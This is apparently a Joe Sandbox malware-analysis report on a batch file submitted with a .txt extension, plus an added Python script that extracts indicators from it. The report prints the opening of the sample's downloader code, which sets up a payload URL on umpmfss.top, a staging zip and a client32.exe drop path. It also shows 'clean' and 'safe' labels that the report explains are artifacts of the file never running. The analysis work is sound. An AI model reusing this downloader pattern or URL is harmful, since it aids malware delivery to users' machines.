Windows Analysis Report
batch file malware.bat.txt

Overview

General Information

Sample name:batch file malware.bat.txt
Analysis ID:1669042
MD5:6ec79021ae9c27ded0f52866130ba850
SHA1:9b7496149c503057dba40c2f659da70291f1397d
SHA256:bfdafe2875fe11bb2b5b36549310f7f96bc4d44a2821c06b030088fee2e64818

Detection

Score:0
Range:0 - 100
Confidence:80%

Note on the score: the sample is a DOS batch file that was submitted with a .txt extension. The cookbook therefore handed it to notepad.exe, the application associated with .txt, and the batch commands were never executed. The score of 0 describes Notepad displaying the file, not what the script would do if run as a .bat; the only trace of the script's intent in this report is the URL recovered as a string from the sample and from Notepad's memory.

Signatures

Queries the volume information (name, serial number etc) of a device

Classification

Label: clean (the report's classification wheel covers Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader and Miner, with verdicts clean, suspicious or malicious)

  • System is w10x64
  • notepad.exe (PID: 7624 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\Desktop\batch file malware.bat.txt MD5: 27F71B12CB585541885A31BE22F61C83)
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


Source: notepad.exe memory dumps (00000000.00000002.2413137464.0000026469A96000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.2413137464.0000026469ABB000.00000004.00000020.00020000.00000000.sdmp) and batch file malware.bat.txt. String found in binary or memory: https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c
Source: classification engine. Classification label: clean0.winTXT@1/0@0/0
Source: C:\Windows\System32\notepad.exe. Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\notepad.exe. Sections loaded (in order): kernel.appcore.dll, uxtheme.dll, mrmcorer.dll, windows.storage.dll, wldp.dll, textshaping.dll, efswrt.dll, mpr.dll, wintypes.dll, twinapi.appcore.dll, oleacc.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, policymanager.dll, msvcp110_win.dll
Source: C:\Windows\System32\notepad.exe. Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32
Source: C:\Windows\System32\notepad.exe. Queries volume information: C:\Users\user\Desktop\batch file malware.bat.txt VolumeInformation
MITRE ATT&CK matrix (one technique per tactic as listed by the report; counts as shown):
  • Reconnaissance: Gather Victim Identity Information
  • Resource Development: Acquire Infrastructure
  • Initial Access: Valid Accounts
  • Execution: Windows Management Instrumentation
  • Persistence: DLL Side-Loading (1)
  • Privilege Escalation: DLL Side-Loading (1)
  • Defense Evasion: DLL Side-Loading (1)
  • Credential Access: OS Credential Dumping
  • Discovery: System Information Discovery (11)
  • Lateral Movement: Remote Services
  • Collection: Data from Local System
  • Command and Control: Data Obfuscation
  • Exfiltration: Exfiltration Over Other Network Medium
  • Impact: Abuse Accessibility Features
Behavior Graph: ID 1669042, sample batch file malware.bat.txt, start date 19/04/2025, architecture WINDOWS, score 0. Single node: notepad.exe, started from the sample.

No Antivirus matches
URL scan results (Source / Detection / Scanner / Label):
  • https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c: 0%, Avira URL Cloud, safe
No contacted domains info
URL reputation (Name / Source / Malicious / Antivirus Detection / Reputation):
  • https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c
    Source: notepad.exe memory dumps 00000000.00000002.2413137464.0000026469A96000.00000004.00000020.00020000.00000000.sdmp and 00000000.00000002.2413137464.0000026469ABB000.00000004.00000020.00020000.00000000.sdmp; batch file malware.bat.txt
    Malicious: false
    Antivirus Detection: Avira URL Cloud: safe
    Reputation: unknown
The "safe" label is a reputation lookup of the URL string at analysis time; the sandbox never contacted the host, since the script was only displayed in Notepad and no network behavior was recorded.
No contacted IP infos
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1669042
Start date and time:2025-04-19 06:04:53 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 45s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:batch file malware.bat.txt
Detection:CLEAN
Classification:clean0.winTXT@1/0@0/0
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .txt
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 184.28.213.193, 20.109.210.53
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed, report is missing behavior information
No simulations
No context
No created / dropped files found
File type:DOS batch file, ASCII text, with CRLF line terminators
Entropy (8bit):5.550147012633201
TrID:
File name:batch file malware.bat.txt
File size:706 bytes
MD5:6ec79021ae9c27ded0f52866130ba850
SHA1:9b7496149c503057dba40c2f659da70291f1397d
SHA256:bfdafe2875fe11bb2b5b36549310f7f96bc4d44a2821c06b030088fee2e64818
SHA512:e407f16b68fc69855273f96151154d5acaf45bf680b758a108272a51d037f9b1815c4af65498783cc03e7370c5e1ba7823e61351768d11b72dfe11f2f22d2a38
SSDEEP:12:wbYVJXJNFAOwAwxbQClfnugXFSu/BNCu/62T981kv1Sf/BCGJjf+2Yjf0fV8Vj0A:wqXvFAOwPbduS1KOvYhCiWljst8VcnIj
TLSH:4001C042521D747DE9F803D4990C1AC75A8DC3DA661B86E9F12A40B84A5D2BB84CB2A4
File Content Preview (non-printable bytes, here the CRLF line breaks, are rendered as dots; the preview is truncated):
@echo off..setlocal enabledelayedexpansion....set "LCVCGBKO=https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c"..set "MBHRSHD=%APPDATA%\MyApp23"..set "CZAHPKO=%APPDATA%\count.zip"..set "LYMINHSKU=!MBHRSHD!\client32.exe"....if not exist "!MBHRSH
Icon Hash:72eaa2aaa2a2a292
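Because the batch was only displayed in Notepad, its indicators reach this report as nothing more than a string match. The following is an added example, not part of the Joe Sandbox report and not the sample's own code, showing how to recover those indicators statically from the preview: it collects the `set "NAME=value"` assignments and resolves the `!NAME!` delayed-expansion references (enabled by `setlocal enabledelayedexpansion`), which is how the script assembles its download URL, drop directory and executable path. The input is constructed from the truncated preview above (only the four `set` lines are usable); the variable names, URL and paths come from the sample, while the function names and regexes are the example's own.

```python
import re
from typing import Dict, List

# Constructed input: the opening lines of the sample as shown in the report's
# "File Content Preview". The preview renders each CRLF as "..", undone here,
# and it is truncated after the `if not exist` line, so only the four `set`
# assignments are available.
SAMPLE_PREVIEW = (
    '@echo off\r\n'
    'setlocal enabledelayedexpansion\r\n'
    '\r\n'
    'set "LCVCGBKO=https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c"\r\n'
    'set "MBHRSHD=%APPDATA%\\MyApp23"\r\n'
    'set "CZAHPKO=%APPDATA%\\count.zip"\r\n'
    'set "LYMINHSKU=!MBHRSHD!\\client32.exe"\r\n'
)

# set "NAME=value" (the quoted form this sample uses; cmd.exe treats NAME case-insensitively)
SET_RE = re.compile(r'^\s*set\s+"([^=]+)=(.*)"\s*$', re.IGNORECASE)
# !NAME! delayed-expansion reference, resolved by cmd.exe when the line executes
DELAYED_RE = re.compile(r'!([^!\s]+)!')
URL_RE = re.compile(r'https?://[^\s"\'<>]+')


def parse_sets(script: str) -> Dict[str, str]:
    """Collect NAME -> raw (unexpanded) value from every `set "NAME=value"` line."""
    env: Dict[str, str] = {}
    for line in script.splitlines():
        m = SET_RE.match(line)
        if m:
            env[m.group(1).strip().upper()] = m.group(2)
    return env


def expand(value: str, env: Dict[str, str], depth: int = 0) -> str:
    """Resolve !NAME! references against the collected variables.

    %NAME% references (immediate expansion of the real environment, e.g.
    %APPDATA%) are left as written because they depend on the victim host.
    Recursion depth is bounded so a self-referencing definition cannot loop.
    """
    if depth > 16:
        return value

    def substitute(m: "re.Match[str]") -> str:
        name = m.group(1).upper()
        if name in env:
            return expand(env[name], env, depth + 1)
        return m.group(0)  # unknown variable: keep the literal text

    return DELAYED_RE.sub(substitute, value)


def extract_iocs(script: str) -> Dict[str, object]:
    """Return the resolved variables plus the URLs and file-system paths they
    contain: the indicators a sandbox would otherwise only expose dynamically."""
    env = parse_sets(script)
    resolved = {name: expand(raw, env) for name, raw in env.items()}
    urls: List[str] = sorted({u for v in resolved.values() for u in URL_RE.findall(v)})
    paths: List[str] = sorted(
        v for v in resolved.values()
        if re.search(r'[\\/]', v) and not URL_RE.match(v)
    )
    return {"variables": resolved, "urls": urls, "paths": paths}


if __name__ == "__main__":
    result = extract_iocs(SAMPLE_PREVIEW)
    for name, value in result["variables"].items():
        print(f"{name:<10} = {value}")
    print("urls :", result["urls"])
    print("paths:", result["paths"])
```

Run against the preview, the extractor yields the download URL, the staging archive `%APPDATA%\count.zip`, the drop directory `%APPDATA%\MyApp23` and the executable `%APPDATA%\MyApp23\client32.exe`, the last of which only exists after `!MBHRSHD!` is expanded. Resubmitting the sample with its real `.bat` extension is still the way to observe what the script actually does with them.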
    No network behavior found

    Target ID:0
    Start time:00:05:47
    Start date:19/04/2025
    Path:C:\Windows\System32\notepad.exe
    Wow64 process (32bit):false
    Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\Desktop\batch file malware.bat.txt
    Imagebase:0x7ff7d6920000
    File size:201'216 bytes
    MD5 hash:27F71B12CB585541885A31BE22F61C83
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    No disassembly